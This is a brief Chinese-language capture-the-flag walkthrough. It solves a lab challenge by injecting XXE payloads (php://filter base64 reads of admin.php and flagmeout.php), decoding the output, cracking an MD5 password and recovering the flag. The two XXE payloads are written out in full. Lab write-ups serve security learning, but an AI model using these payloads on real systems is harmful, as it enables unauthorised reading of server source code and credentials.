进入靶场
进入robots.txt
得到了2个地址,我们尝试访问一下
得到了一个登录地址,登录抓包一下
发给重放器,构造xml语句
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
把得到的一串代码进行进行base64解码
解码完成后放下翻发现有用户名和密码,用户名为administhebest,但是密码是被md5加密的
解密得到密码
进去admin.php尝试登录
登录成功出现了flag,点一下看看
不对,那我们进入xee目录进行抓包并读取文件
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ELEMENT root ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=./flagmeout.php">
]>
<root><name>&admin;</name><password>admin</password></root>
将得到的代码进行base64解码
对括号里的进行base32解码
将得到的代码在进行base64解码
得到了flag的目录那么我们再次进入到xee目录的界面进行抓包读取
我们再次进行base64解码
解码之后得出一段php代码
我们打开小皮面板进入自己网站的根目录,创建一个php文件进行访问,把刚刚解码的php代码复制进去,并加上<?php 的开头保存然后进行访问
这里我们就得到了flag